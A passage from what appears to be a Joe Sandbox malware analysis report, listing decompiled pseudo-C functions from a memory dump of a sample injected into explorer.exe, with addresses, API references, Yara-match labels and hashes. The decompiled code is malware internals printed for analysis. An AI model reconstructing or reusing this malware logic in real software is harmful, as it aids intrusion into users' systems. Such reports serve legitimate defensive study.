					_push(_t88);
					_push(_t88);
					_push( &_v32);
					_t84 =  *0x7bf820; // 0xeaf8b8
					if( *((intOrPtr*)(_t84 + 0xc))() == 0) {
						goto L14;
					} else {
						_t86 = _v8;
						if(_t86 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t86;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t72 =  *0x7bf820; // 0xeaf8b8
						_push(1); // executed
						if( *((intOrPtr*)(_t72 + 8))() != 0) {
							goto L14;
						}
						_t92 = LocalAlloc(0x40, 0x14);
						if(_t92 == 0) {
							goto L14;
						}
						_t89 =  *0x7bf820; // 0xeaf8b8
						_push(1);
						_push(_t92);
						if( *((intOrPtr*)(_t89 + 0x90))() == 0) {
							goto L14;
						}
						_t76 =  *0x7bf820; // 0xeaf8b8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t92);
						if( *((intOrPtr*)(_t76 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t80 =  *0x7bf820; // 0xeaf8b8
							 *((intOrPtr*)(_t80 + 0x10))(_v8);
						}
						_t78 =  *0x7bf820; // 0xeaf8b8
						 *((intOrPtr*)(_t78 + 0x10))(_v12);
						goto L22;
					}
				}
			}





































                                                                                                                                                                        0x007acb82
                                                                                                                                                                        0x007acb8d
                                                                                                                                                                        0x007acb93
                                                                                                                                                                        0x007acb97
                                                                                                                                                                        0x007acb99
                                                                                                                                                                        0x007acba0
                                                                                                                                                                        0x007acba3
                                                                                                                                                                        0x007acba6
                                                                                                                                                                        0x007acba9
                                                                                                                                                                        0x007acbb4
                                                                                                                                                                        0x007acbb5
                                                                                                                                                                        0x007acbb6
                                                                                                                                                                        0x007acbb7
                                                                                                                                                                        0x007acbb8
                                                                                                                                                                        0x007acbb9
                                                                                                                                                                        0x007acbba
                                                                                                                                                                        0x007acbbb
                                                                                                                                                                        0x007acbbc
                                                                                                                                                                        0x007acbbd
                                                                                                                                                                        0x007acbc1
                                                                                                                                                                        0x007acbc2
                                                                                                                                                                        0x007acbcc
                                                                                                                                                                        0x007accbe
                                                                                                                                                                        0x007accc1
                                                                                                                                                                        0x007accc3
                                                                                                                                                                        0x007acccb
                                                                                                                                                                        0x007acccb
                                                                                                                                                                        0x007accd1
                                                                                                                                                                        0x007accd3
                                                                                                                                                                        0x007accdb
                                                                                                                                                                        0x007accdb
                                                                                                                                                                        0x007acce0
                                                                                                                                                                        0x007acce2
                                                                                                                                                                        0x007acce8
                                                                                                                                                                        0x007acce8
                                                                                                                                                                        0x007accee
                                                                                                                                                                        0x007accf0
                                                                                                                                                                        0x007accf8
                                                                                                                                                                        0x007accf8
                                                                                                                                                                        0x007accfc
                                                                                                                                                                        0x007acd01
                                                                                                                                                                        0x007acd01
                                                                                                                                                                        0x007acbd5
                                                                                                                                                                        0x007acbd8
                                                                                                                                                                        0x007acbdf
                                                                                                                                                                        0x007acbe0
                                                                                                                                                                        0x007acbe7
                                                                                                                                                                        0x007acbea
                                                                                                                                                                        0x007acbf1
                                                                                                                                                                        0x007acbf4
                                                                                                                                                                        0x007acbff
                                                                                                                                                                        0x007acc0a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007acc0c
                                                                                                                                                                        0x007acc0c
                                                                                                                                                                        0x007acc0f
                                                                                                                                                                        0x007acc10
                                                                                                                                                                        0x007acc11
                                                                                                                                                                        0x007acc12
                                                                                                                                                                        0x007acc13
                                                                                                                                                                        0x007acc14
                                                                                                                                                                        0x007acc15
                                                                                                                                                                        0x007acc16
                                                                                                                                                                        0x007acc18
                                                                                                                                                                        0x007acc19
                                                                                                                                                                        0x007acc1d
                                                                                                                                                                        0x007acc1e
                                                                                                                                                                        0x007acc28
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007acc2e
                                                                                                                                                                        0x007acc2e
                                                                                                                                                                        0x007acc33
                                                                                                                                                                        0x007acc35
                                                                                                                                                                        0x007acc37
                                                                                                                                                                        0x007acc38
                                                                                                                                                                        0x007acc3f
                                                                                                                                                                        0x007acc42
                                                                                                                                                                        0x007acc49
                                                                                                                                                                        0x007acc4c
                                                                                                                                                                        0x007acc4f
                                                                                                                                                                        0x007acc4f
                                                                                                                                                                        0x007acc52
                                                                                                                                                                        0x007acc55
                                                                                                                                                                        0x007acc56
                                                                                                                                                                        0x007acc5a
                                                                                                                                                                        0x007acc5b
                                                                                                                                                                        0x007acc60
                                                                                                                                                                        0x007acc66
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007acc72
                                                                                                                                                                        0x007acc76
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007acc78
                                                                                                                                                                        0x007acc7e
                                                                                                                                                                        0x007acc80
                                                                                                                                                                        0x007acc89
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007acc8b
                                                                                                                                                                        0x007acc90
                                                                                                                                                                        0x007acc91
                                                                                                                                                                        0x007acc94
                                                                                                                                                                        0x007acc96
                                                                                                                                                                        0x007acc9f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007acca4
                                                                                                                                                                        0x007acca6
                                                                                                                                                                        0x007accae
                                                                                                                                                                        0x007accae
                                                                                                                                                                        0x007accb1
                                                                                                                                                                        0x007accb9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007accb9
                                                                                                                                                                        0x007acc28

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8D6D: memset.MSVCRT ref: 007A8D7F
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 007ACC6C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocalmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1202173703-0
                                                                                                                                                                        • Opcode ID: 956f326c1d0017608e611382df8f0d2b98185e7d05aa8f98525555e4a0b4f920
                                                                                                                                                                        • Instruction ID: 271a52d1cb8239bb49811708ef8bab29e4366ecd2e30611a06f5288a42e412bb
                                                                                                                                                                        • Opcode Fuzzy Hash: 956f326c1d0017608e611382df8f0d2b98185e7d05aa8f98525555e4a0b4f920
                                                                                                                                                                        • Instruction Fuzzy Hash: FC511971900208EFDB11DF99DC88EADBBF8BF49710F14826AE515E7261D3749A01CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B0B23 Relevance: 1.4, APIs: 1, Instructions: 115sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E007B0B23(void* __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t27;
				char _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t37;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr* _t61;
				intOrPtr _t64;
				signed int _t71;
				void* _t75;
				void* _t78;
				void* _t79;

				_t27 =  *0x7bf7e4; // 0xeafb48
				_t28 = E007A8BDE( *((intOrPtr*)(_t27 + 4))); // executed
				_v12 = _t28;
				if(_t28 != 0) {
					_t61 =  *0x7bf7e4; // 0xeafb48
					if( *((intOrPtr*)(_t61 + 4)) > 0x400) {
						E007A8CBB(_t28,  *_t61, 0x400);
						_v8 = _v8 & 0x00000000;
						_t37 = E007A109A(_t61, 0x294);
						_t64 =  *0x7bf81c; // 0x7d0000
						asm("sbb ecx, ecx");
						_t38 = E007A9DF2(( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8, ( ~( *(_t64 + 0xa8)) & 0x00000a0b) + 0xf8);
						_push(0);
						_push(_t37);
						_v24 = _t38;
						_push(0x7bc9a0);
						_push(_t38);
						_t39 =  *0x7bf81c; // 0x7d0000
						_push(0x7bc9a0);
						_v20 = E007A9A5A(_t39 + 0x1020);
						_t42 = E007AB3C7(_t41,  &_v8); // executed
						_v16 = _t42;
						E007A8BAF( &_v24);
						E007A8BAF( &_v20);
						_t73 = _v16;
						_t79 = _t78 + 0x3c;
						_t71 = _v8;
						if(_v16 != 0 && _t71 > 0x400) {
							_t51 =  *0x7bf7e4; // 0xeafb48
							if(_t71 >=  *(_t51 + 4)) {
								_t71 =  *(_t51 + 4);
							}
							E007A8CBB(_v12 + 0x400, _t73 + 0x400, _t71 - 0x400);
							_t71 = _v8;
							_t79 = _t79 + 0xc;
						}
						E007A8BF4( &_v16, _t71);
						E007A8BF4( &_v20, 0xfffffffe);
						_t28 = _v12;
						_t78 = _t79 + 0x10;
					}
					_t75 = 0;
					while(1) {
						_t30 =  *0x7bf81c; // 0x7d0000
						_t32 = E007AB467(_t30 + 0x228, _t28, 0x1000); // executed
						_t78 = _t78 + 0xc;
						if(_t32 >= 0) {
							break;
						}
						Sleep(1);
						_t75 = _t75 + 1;
						if(_t75 < 0x2710) {
							_t28 = _v12;
							continue;
						}
						break;
					}
					E007A8BF4( &_v12, 0); // executed
				}
				return 0;
			}























                                                                                                                                                                        0x007b0b29
                                                                                                                                                                        0x007b0b31
                                                                                                                                                                        0x007b0b36
                                                                                                                                                                        0x007b0b3c
                                                                                                                                                                        0x007b0b42
                                                                                                                                                                        0x007b0b52
                                                                                                                                                                        0x007b0b5c
                                                                                                                                                                        0x007b0b61
                                                                                                                                                                        0x007b0b6a
                                                                                                                                                                        0x007b0b6f
                                                                                                                                                                        0x007b0b7f
                                                                                                                                                                        0x007b0b8e
                                                                                                                                                                        0x007b0b93
                                                                                                                                                                        0x007b0b95
                                                                                                                                                                        0x007b0b9b
                                                                                                                                                                        0x007b0b9e
                                                                                                                                                                        0x007b0b9f
                                                                                                                                                                        0x007b0ba0
                                                                                                                                                                        0x007b0ba5
                                                                                                                                                                        0x007b0bb4
                                                                                                                                                                        0x007b0bb9
                                                                                                                                                                        0x007b0bbe
                                                                                                                                                                        0x007b0bc5
                                                                                                                                                                        0x007b0bce
                                                                                                                                                                        0x007b0bd3
                                                                                                                                                                        0x007b0bd6
                                                                                                                                                                        0x007b0bd9
                                                                                                                                                                        0x007b0bde
                                                                                                                                                                        0x007b0be4
                                                                                                                                                                        0x007b0bec
                                                                                                                                                                        0x007b0bee
                                                                                                                                                                        0x007b0bee
                                                                                                                                                                        0x007b0c08
                                                                                                                                                                        0x007b0c0d
                                                                                                                                                                        0x007b0c10
                                                                                                                                                                        0x007b0c10
                                                                                                                                                                        0x007b0c18
                                                                                                                                                                        0x007b0c23
                                                                                                                                                                        0x007b0c28
                                                                                                                                                                        0x007b0c2b
                                                                                                                                                                        0x007b0c2b
                                                                                                                                                                        0x007b0c2e
                                                                                                                                                                        0x007b0c30
                                                                                                                                                                        0x007b0c36
                                                                                                                                                                        0x007b0c41
                                                                                                                                                                        0x007b0c46
                                                                                                                                                                        0x007b0c4b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b0c54
                                                                                                                                                                        0x007b0c5a
                                                                                                                                                                        0x007b0c61
                                                                                                                                                                        0x007b0c63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b0c63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b0c61
                                                                                                                                                                        0x007b0c6e
                                                                                                                                                                        0x007b0c76
                                                                                                                                                                        0x007b0c7a

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • Sleep.KERNELBASE(00000001,?,00000000,00000000,?,?,?,?,007B0A51,?,?,?,007B0E19,00000000), ref: 007B0C54
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeapSleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4201116106-0
                                                                                                                                                                        • Opcode ID: 804e2c14ae6248688378f997d9ce4fbeca32768f475de79a25387e24a590ad26
                                                                                                                                                                        • Instruction ID: 8503e2ab6ef3a59c5733a3ad814c0336e9736d5ada3fe2f30162f84bb4fe1d8c
                                                                                                                                                                        • Opcode Fuzzy Hash: 804e2c14ae6248688378f997d9ce4fbeca32768f475de79a25387e24a590ad26
                                                                                                                                                                        • Instruction Fuzzy Hash: F54185B1A00104EBDB14EBA4CC8AFEE77ACEB45304F148779F505E7282DB38E9458765
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AF236 Relevance: 1.3, APIs: 1, Instructions: 92sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E007AF236(void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v544;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t48;
				intOrPtr _t58;
				void* _t65;
				intOrPtr _t66;
				void* _t70;
				signed int _t73;
				void* _t75;
				void* _t77;

				_t77 = __fp0;
				_v20 = 0;
				_v28 = 0;
				_v24 = 0;
				_t66 =  *0x7bf848; // 0xeaf898, executed
				_t40 =  *((intOrPtr*)(_t66 + 4))(_t65, 0, 2,  &_v8, 0xffffffff,  &_v20,  &_v28,  &_v24);
				if(_t40 == 0) {
					_t73 = 0;
					if(_v20 <= 0) {
						L9:
						_t41 =  *0x7bf848; // 0xeaf898
						 *((intOrPtr*)(_t41 + 0xc))(_v8);
						return 0;
					}
					do {
						_v16 = 0;
						_v12 = 0;
						_t48 =  *0x7bf820; // 0xeaf8b8
						 *((intOrPtr*)(_t48 + 0xc4))(0,  *((intOrPtr*)(_v8 + _t73 * 4)), 0,  &_v16, 0,  &_v12,  &_v32);
						_t70 = E007A8BDE(_v16 + 1);
						if(_t70 != 0) {
							_v12 = 0x200;
							_push( &_v32);
							_push( &_v12);
							_push( &_v544);
							_push( &_v16);
							_push(_t70);
							_push( *((intOrPtr*)(_v8 + _t73 * 4)));
							_t58 =  *0x7bf820; // 0xeaf8b8
							_push(0);
							if( *((intOrPtr*)(_t58 + 0xc4))() != 0) {
								E007A4FA3(_t77,  *((intOrPtr*)(_v8 + _t73 * 4)), _t70, _a4);
								_t75 = _t75 + 0xc;
								Sleep(0xa);
							}
						}
						_t73 = _t73 + 1;
					} while (_t73 < _v20);
					goto L9;
				}
				return _t40 | 0xffffffff;
			}





















                                                                                                                                                                        0x007af236
                                                                                                                                                                        0x007af249
                                                                                                                                                                        0x007af250
                                                                                                                                                                        0x007af259
                                                                                                                                                                        0x007af261
                                                                                                                                                                        0x007af267
                                                                                                                                                                        0x007af26c
                                                                                                                                                                        0x007af277
                                                                                                                                                                        0x007af27c
                                                                                                                                                                        0x007af315
                                                                                                                                                                        0x007af315
                                                                                                                                                                        0x007af31d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af322
                                                                                                                                                                        0x007af283
                                                                                                                                                                        0x007af286
                                                                                                                                                                        0x007af28d
                                                                                                                                                                        0x007af29d
                                                                                                                                                                        0x007af2a3
                                                                                                                                                                        0x007af2b3
                                                                                                                                                                        0x007af2b8
                                                                                                                                                                        0x007af2bd
                                                                                                                                                                        0x007af2c4
                                                                                                                                                                        0x007af2c8
                                                                                                                                                                        0x007af2cf
                                                                                                                                                                        0x007af2d3
                                                                                                                                                                        0x007af2d7
                                                                                                                                                                        0x007af2d8
                                                                                                                                                                        0x007af2db
                                                                                                                                                                        0x007af2e0
                                                                                                                                                                        0x007af2e9
                                                                                                                                                                        0x007af2f5
                                                                                                                                                                        0x007af2ff
                                                                                                                                                                        0x007af304
                                                                                                                                                                        0x007af304
                                                                                                                                                                        0x007af2e9
                                                                                                                                                                        0x007af30a
                                                                                                                                                                        0x007af30b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007af314
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 007AF304
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 0899e8e3844231c1d538e21fc6cb23b3d856e242103406cd0ae46af229b33f02
                                                                                                                                                                        • Instruction ID: 82f6b1a31323157437637cd670bd08d56da928981f3fcd070c078b16fbef91da
                                                                                                                                                                        • Opcode Fuzzy Hash: 0899e8e3844231c1d538e21fc6cb23b3d856e242103406cd0ae46af229b33f02
                                                                                                                                                                        • Instruction Fuzzy Hash: FD31C3B6900109AFDB11DFD8DC88EEEBBBCFB49314F1442AAE515E7251D7349A058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AB025 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E007AB025(intOrPtr* __edx, void* __fp0) {
				intOrPtr _v8;
				void* __ecx;
				void* _t20;
				intOrPtr _t21;
				void* _t26;
				void* _t28;
				intOrPtr* _t43;
				signed int _t46;
				void* _t54;

				_t54 = __fp0;
				_push(_t28);
				_t43 = __edx;
				_t46 = 0;
				_t26 = _t28;
				if( *__edx > 0) {
					do {
						_t20 = E007AAA00(_t26,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + _t46 * 8))); // executed
						_t49 = _t20;
						if(_t20 == 0) {
							_t21 = E007A9F6F( *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + 4 + _t46 * 8)), _t49);
							_v8 = _t21;
							if(_t21 != 0) {
								L6:
								E007AAA7E(_t21); // executed
							} else {
								if(GetLastError() != 0xd) {
									_t21 = _v8;
									goto L6;
								} else {
									E007AAAA3( *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + _t46 * 8)), _t54,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 4)) + 4 + _t46 * 8))); // executed
								}
							}
						}
						_t46 = _t46 + 1;
					} while (_t46 <  *_t43);
				}
				return 0;
			}












                                                                                                                                                                        0x007ab025
                                                                                                                                                                        0x007ab028
                                                                                                                                                                        0x007ab02c
                                                                                                                                                                        0x007ab02e
                                                                                                                                                                        0x007ab030
                                                                                                                                                                        0x007ab034
                                                                                                                                                                        0x007ab036
                                                                                                                                                                        0x007ab03e
                                                                                                                                                                        0x007ab043
                                                                                                                                                                        0x007ab045
                                                                                                                                                                        0x007ab04e
                                                                                                                                                                        0x007ab053
                                                                                                                                                                        0x007ab058
                                                                                                                                                                        0x007ab07b
                                                                                                                                                                        0x007ab084
                                                                                                                                                                        0x007ab05a
                                                                                                                                                                        0x007ab063
                                                                                                                                                                        0x007ab078
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ab065
                                                                                                                                                                        0x007ab071
                                                                                                                                                                        0x007ab071
                                                                                                                                                                        0x007ab063
                                                                                                                                                                        0x007ab089
                                                                                                                                                                        0x007ab08a
                                                                                                                                                                        0x007ab08b
                                                                                                                                                                        0x007ab036
                                                                                                                                                                        0x007ab095

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00000000,?,007A52C1), ref: 007AB05A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                        • Opcode ID: 48f6ad65256e24cf9b444c0a08cf6662de50c72b7784db320558544473699dbb
                                                                                                                                                                        • Instruction ID: 0f9da073dbc705915d994473cc3ea43a6f785cfaa7cae233a10c0baf7fe07851
                                                                                                                                                                        • Opcode Fuzzy Hash: 48f6ad65256e24cf9b444c0a08cf6662de50c72b7784db320558544473699dbb
                                                                                                                                                                        • Instruction Fuzzy Hash: A2017C38300002EB8B24EB69C68482BF7AAFFC63557208368E816C7312D735ED41CBD0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A6247 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E007A6247(void* __ecx, void* __eflags) {
				void* _t2;
				WCHAR* _t3;
				WCHAR* _t4;
				intOrPtr _t6;
				signed int _t8;
				WCHAR* _t10;
				void* _t11;
				void* _t12;
				intOrPtr _t14;

				_t2 = E007A5CE2(__eflags); // executed
				if(_t2 == 0) {
					_t14 =  *0x7bf81c; // 0x7d0000
					_t3 = E007A5EDD( *((intOrPtr*)(_t14 + 0xac)), 0, __eflags); // executed
					 *0x7bf840 = _t3;
					__eflags = _t3;
					if(_t3 != 0) {
						_t4 = E007AA9D6();
						__eflags = _t4;
						if(_t4 == 0) {
							__eflags = 0;
							return 0;
						} else {
							_t6 =  *0x7bf81c; // 0x7d0000
							_t8 = lstrcmpiW(_t6 + 0x228, _t4);
							asm("sbb eax, eax");
							_t10 =  ~_t8 + 1;
							__eflags = _t10;
							return _t10;
						}
					} else {
						_t11 = 2;
						return _t11;
					}
				} else {
					_t12 = 3;
					return _t12;
				}
			}












                                                                                                                                                                        0x007a6247
                                                                                                                                                                        0x007a624e
                                                                                                                                                                        0x007a6254
                                                                                                                                                                        0x007a6262
                                                                                                                                                                        0x007a6267
                                                                                                                                                                        0x007a626c
                                                                                                                                                                        0x007a626e
                                                                                                                                                                        0x007a6274
                                                                                                                                                                        0x007a6279
                                                                                                                                                                        0x007a627b
                                                                                                                                                                        0x007a6295
                                                                                                                                                                        0x007a6297
                                                                                                                                                                        0x007a627d
                                                                                                                                                                        0x007a627e
                                                                                                                                                                        0x007a6289
                                                                                                                                                                        0x007a6291
                                                                                                                                                                        0x007a6293
                                                                                                                                                                        0x007a6293
                                                                                                                                                                        0x007a6294
                                                                                                                                                                        0x007a6294
                                                                                                                                                                        0x007a6270
                                                                                                                                                                        0x007a6272
                                                                                                                                                                        0x007a6273
                                                                                                                                                                        0x007a6273
                                                                                                                                                                        0x007a6250
                                                                                                                                                                        0x007a6252
                                                                                                                                                                        0x007a6253
                                                                                                                                                                        0x007a6253

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 38c16e0352e0226c1ea6f19d8bc8c155704f9d4744c2c3eff9f9b2be3f72441c
                                                                                                                                                                        • Instruction ID: 4c1ee36469c52d1a3c3a6b694269fe566f88fc8d02c067825209f7a9fe31fdc7
                                                                                                                                                                        • Opcode Fuzzy Hash: 38c16e0352e0226c1ea6f19d8bc8c155704f9d4744c2c3eff9f9b2be3f72441c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8EE012B13516029AEF10A735AC19F2623D96BC6705F18C770F505DA1D9FF2CD901D514
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 007AEA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E007AEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E007AE400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E007A8BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E007A8BF4( &_v60, 0xfffffffe);
					E007AE4B4( &_v104);
					return _t320;
				}
				_t165 = E007A9DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E007A9DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E007A9A5A(_t165);
				_v60 = _t322;
				E007A8BAF( &_v52);
				E007A8BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E007A9DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E007A8BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E007A8BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E007A98BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E007A98BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E007A8C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E007A8BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
